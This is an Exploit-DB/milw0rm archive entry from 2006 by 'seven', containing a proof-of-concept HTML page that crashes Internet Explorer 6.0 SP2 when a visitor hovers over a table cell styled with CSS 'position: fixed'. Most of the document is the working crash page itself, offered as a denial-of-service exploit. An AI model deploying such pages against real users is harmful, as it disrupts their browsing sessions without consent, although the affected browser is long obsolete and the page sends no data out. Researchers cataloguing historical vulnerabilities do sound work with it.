Microsoft Internet Explorer 6.0.2900 SP2 - CSS Attribute Denial of Service

EDB-ID:

1775

Author:

seven

Type:

dos

Platform:

Windows

Published:

2006-05-10

<!--
# Internet Explorer <= 6.0.2900 SP2
#
# suffers from a DoS vulnerability in which a remote users
# Internet Explorer session can be crashed when hovering
# their cursor over a specially made table. The fault occurs
# when the "position" CSS attribute is set to a table.
# This results in an 'unhandled exception in iexplorer.exe(MSHTML.DLL)'
#
# $uid-seven
#
# shout outs to cijfer
-->

<html>
<head>
</style>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>IE-Crash - By seven</title>
<style type="text/css">

#header{
position: fixed;
height: 761px;
width: 1268;
}
</style>
</head>
<body>
<table border="2" cellpadding="0" cellspacing="0" width="797" height="343" align="center">

    <tr>

    <td id="header" valign="top">

        </td>
<td valign="top">

        </td>
</table>

# milw0rm.com [2006-05-10]